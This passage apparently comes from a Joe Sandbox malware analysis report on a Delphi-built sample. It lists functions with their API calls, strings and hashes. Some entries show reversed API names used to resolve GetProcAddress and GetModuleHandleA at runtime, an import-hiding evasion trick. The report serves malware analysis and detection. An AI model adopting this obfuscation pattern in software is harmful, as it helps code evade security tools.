                                        • Opcode Fuzzy Hash: 53c2e16e614cdda274d01083d3f72a9cd75f15adb28e0c684e1abdf45cd9c734
                                        • Instruction Fuzzy Hash: 3FF050E0AC97327EF7027F709CC19A7379D97126C43001BE576525A912DEB588505F58
                                        Function 02B32530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B328CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                        • API String ID: 2030045667-32948583
                                        • Opcode ID: 666a3ed47fc132b20d3fd9378fba52a8403cb125c8d7663c8c71091e0ef6fcf4
                                        • Instruction ID: 79a5840c020d31b4231e5245db91dcae3b8aa0a6ad73facddd53346aa9f58134
                                        • Opcode Fuzzy Hash: 666a3ed47fc132b20d3fd9378fba52a8403cb125c8d7663c8c71091e0ef6fcf4
                                        • Instruction Fuzzy Hash: 29A1E331A042648BDF23AA2CCC80B99B7E5EF09750F1441E5ED49AB386CB759EC9CF51
                                        Function 02B3252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                        Download Yara Rule
                                        Strings
                                        • bytes: , xrefs: 02B3275D
                                        • The unexpected small block leaks are:, xrefs: 02B32707
                                        • , xrefs: 02B32814
                                        • Unexpected Memory Leak, xrefs: 02B328C0
                                        • An unexpected memory leak has occurred. , xrefs: 02B32690
                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B32849
                                        • 7, xrefs: 02B326A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                        • API String ID: 0-2723507874
                                        • Opcode ID: a469271652126a2d623fe34c796e608403d30ecba395c8b988a30fad6c5cc25c
                                        • Instruction ID: 27508cb8d7e4521f14544ab1e4fd4a185cecd26ff4fb674cc95bbb6f0e3b4c7c
                                        • Opcode Fuzzy Hash: a469271652126a2d623fe34c796e608403d30ecba395c8b988a30fad6c5cc25c
                                        • Instruction Fuzzy Hash: 9071B330A042A88FDF22AA2CCC84BD9BAE5FF09754F1041E5E949DB281DB759EC5CF51
                                        Function 02B4AE20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4AE40
                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B4AE57
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 02B4AE6F
                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B4AEEB
                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B4AEF7
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B4AF0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Read$HandleLibraryLoadModule
                                        • String ID: KernelBase$LoadLibraryExA
                                        • API String ID: 2872661360-113032527
                                        • Opcode ID: 4f43887ce494a21add9b74384abb33aaa6b9ab63baf782930f285043f3ae6fe1
                                        • Instruction ID: 1f3b7059ce09abcce059b9fe8ab9e31b672de50080c3358ef8ca69274f44f4f7
                                        • Opcode Fuzzy Hash: 4f43887ce494a21add9b74384abb33aaa6b9ab63baf782930f285043f3ae6fe1
                                        • Instruction Fuzzy Hash: 443176B2A80305BBEB20DF58CCD5F9A77A8EF05754F104294FA54EB281DB70E940EB64
                                        Function 02B3BD48 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetThreadLocale.KERNEL32(00000000,02B3C013,?,?,00000000,00000000), ref: 02B3BD7E
                                          • Part of subcall function 02B3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Locale$InfoThread
                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                        • API String ID: 4232894706-2493093252
                                        • Opcode ID: 86c99f4eb6b682b4447447135b77ec0113dde66f35f534219f8bdffb72422d8d
                                        • Instruction ID: 6f670644a999030264e3303ce43725763d38e5c44a640f4f8d3c6247c8cdc2ca
                                        • Opcode Fuzzy Hash: 86c99f4eb6b682b4447447135b77ec0113dde66f35f534219f8bdffb72422d8d
                                        • Instruction Fuzzy Hash: DF612036B401489BDB02FBE4D8D0A9E7BBB9B49300F6098F5E101EB345DA35D9059B54
                                        Function 02B3432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?,02B907C8,?,?,02B5D7A8,02B3655D,02B5C30D), ref: 02B34365
                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?,02B907C8,?,?,02B5D7A8,02B3655D,02B5C30D), ref: 02B3436B
                                        • GetStdHandle.KERNEL32(000000F5,02B343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?,02B907C8), ref: 02B34380
                                        • WriteFile.KERNEL32(00000000,000000F5,02B343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B343F3,?,?), ref: 02B34386
                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B343A4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileHandleWrite$Message
                                        • String ID: Error$Runtime error at 00000000
                                        • API String ID: 1570097196-2970929446
                                        • Opcode ID: 393f27be11815c09e0d9996903987ebbec7a6a96cf463970fa4e65643476f47b
                                        • Instruction ID: e90be6a6e3bef96e276c2e56038ee614e101dbe4191bf253177a19a533beaafd
                                        • Opcode Fuzzy Hash: 393f27be11815c09e0d9996903987ebbec7a6a96cf463970fa4e65643476f47b
                                        • Instruction Fuzzy Hash: 53F0B471AD434179FB12BA64AC46F99376C8B45F64F148BD4B678AA0D0C7E0E0C4CB27
                                        Function 02B3AE4C Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B3ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B3ACE1
                                          • Part of subcall function 02B3ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B3AD05
                                          • Part of subcall function 02B3ACC4: GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B3AD20
                                          • Part of subcall function 02B3ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B3ADB6
                                        • CharToOemA.USER32(?,?), ref: 02B3AE83
                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEA0
                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEA6
                                        • GetStdHandle.KERNEL32(000000F4,02B3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEBB
                                        • WriteFile.KERNEL32(00000000,000000F4,02B3AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B3AEC1
                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B3AEE3
                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B3AEF9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                        • String ID:
                                        • API String ID: 185507032-0
                                        • Opcode ID: 643b5c64b1d541831dcc171af6fd63d436a305cf074411f8d9b9f052c059182a
                                        • Instruction ID: e1abf99d3f06e584af3ff31f5516107620d17494df784f72805a48a289567875
                                        • Opcode Fuzzy Hash: 643b5c64b1d541831dcc171af6fd63d436a305cf074411f8d9b9f052c059182a
                                        • Instruction Fuzzy Hash: 791170B2584204BAD202FBA4CC80F9B77EDAB44740F900996B784D70D0DA70E944CF26
                                        Function 02B3E514 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                        Download Yara Rule
                                        APIs
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B3E5AD
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B3E5C9
                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B3E602
                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B3E67F
                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B3E698
                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02B3E6CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                        • String ID:
                                        • API String ID: 351091851-0
                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                        • Instruction ID: b473f086076d61dddd55953e5b94e6d199e624cabbdbb99ef0e937013a7c3b30
                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                        • Instruction Fuzzy Hash: 3051C87690062E9BCB22EB58C890BD9B3BDAF4D300F4441D6E549E7252DB70EF858F61
                                        Function 02B33568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B3358A
                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B335BD
                                        • RegCloseKey.ADVAPI32(?,02B335E0,00000000,?,00000004,00000000,02B335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B335D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                        • API String ID: 3677997916-4173385793
                                        • Opcode ID: bc3408ba63352a8a53d15d9d93ac6c1093f83248561e61738b11ea8648e8bcf8
                                        • Instruction ID: 6fb3e4a201064f1d342de433a11a2a180c8070edcd4edb5f997e528c90780b78
                                        • Opcode Fuzzy Hash: bc3408ba63352a8a53d15d9d93ac6c1093f83248561e61738b11ea8648e8bcf8
                                        • Instruction Fuzzy Hash: 8401D876954318BAF712DB94CD02BBE77ECEB08710F1005E1BA04D7580E6749610CB98
                                        Function 02B480C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                        • GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: Kernel32$sserddAcorPteG
                                        • API String ID: 667068680-1372893251
                                        • Opcode ID: e3b5327e77f65abe637f0a866c824ef1850bb2b538eb8240caa5015947f23ab2
                                        • Instruction ID: cc25984ccf0bb10061a85618eaee19f1332e9fc0e0b2c8e57fc72df013274c71
                                        • Opcode Fuzzy Hash: e3b5327e77f65abe637f0a866c824ef1850bb2b538eb8240caa5015947f23ab2
                                        • Instruction Fuzzy Hash: D5016235A54304BFEB02EFA8DC81E9E77BEEB4D750F5188E5F504E7650DA30A910EA24
                                        Function 02B3A9D8 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetThreadLocale.KERNEL32(?,00000000,02B3AA6F,?,?,00000000), ref: 02B3A9F0
                                          • Part of subcall function 02B3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B3AA6F,?,?,00000000), ref: 02B3AA20
                                        • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 02B3AA2B
                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B3AA6F,?,?,00000000), ref: 02B3AA49
                                        • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 02B3AA54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Locale$InfoThread$CalendarEnum
                                        • String ID:
                                        • API String ID: 4102113445-0
                                        • Opcode ID: 6f1860d6f292f2c1307375a069e9140fa0808e84182ad6f36e64b750576debba
                                        • Instruction ID: 02971378a5a8a92e2e1bd146d37c828bf39264471dbf0d0acd1559c94e80b26e
                                        • Opcode Fuzzy Hash: 6f1860d6f292f2c1307375a069e9140fa0808e84182ad6f36e64b750576debba
                                        • Instruction Fuzzy Hash: 2B012B326402487FF703F7748D12B5E735DDB41720F7145E0F651E66D0DA249E008AA8
                                        Function 02B3AA88 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetThreadLocale.KERNEL32(?,00000000,02B3AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02B3AAB7
                                          • Part of subcall function 02B3A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B3A76A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Locale$InfoThread
                                        • String ID: eeee$ggg$yyyy
                                        • API String ID: 4232894706-1253427255
                                        • Opcode ID: e332ee4be0ffa2e03fedcf069d801e728827c4eda334ceb9e2dc4a2831b281c9
                                        • Instruction ID: fd17772f3750bcc9cb5c27928b7b3272f6d878f896c2b30d5e4783dd9a9fb5e5
                                        • Opcode Fuzzy Hash: e332ee4be0ffa2e03fedcf069d801e728827c4eda334ceb9e2dc4a2831b281c9
                                        • Instruction Fuzzy Hash: EA41D3757045058BD713AB698C902BEB3FBDB85200BB44AE5E4F2C7344EA38ED06CA21
                                        Function 02B47DD8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02B47E5F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$MemoryMove
                                        • String ID: Ntdll$RtlM$oveM
                                        • API String ID: 2705147948-1610840992
                                        • Opcode ID: 83d55a31900d359b8ed989924d849827304e6cdc3a598fef82342778dca0a84d
                                        • Instruction ID: 93f2252d4272d36c792ef98a4e52810ab6f0a33db24813b297084b0c0b08199e
                                        • Opcode Fuzzy Hash: 83d55a31900d359b8ed989924d849827304e6cdc3a598fef82342778dca0a84d
                                        • Instruction Fuzzy Hash: 77017C35694204BFFB11EAA8DD82F6AB7BDE708B00F5149A0F505AB650DF70AD00BA24
                                        Function 02B48020 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc
                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                        • API String ID: 1883125708-1952140341
                                        • Opcode ID: f576597a69a09654f60ebb618e2f4820da52f17cc3a5c4ede3288082c318233d
                                        • Instruction ID: 4d2dfcae9eec958f4f2f688cc62a8457712905ebf9978b7de86140f5ecbd4198
                                        • Opcode Fuzzy Hash: f576597a69a09654f60ebb618e2f4820da52f17cc3a5c4ede3288082c318233d
                                        • Instruction Fuzzy Hash: C5F06231664304BFEB11EFA8DC8295E77BDE749740B5149E0F50493B20DE30BD10AA64
                                        Function 02B4EB94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
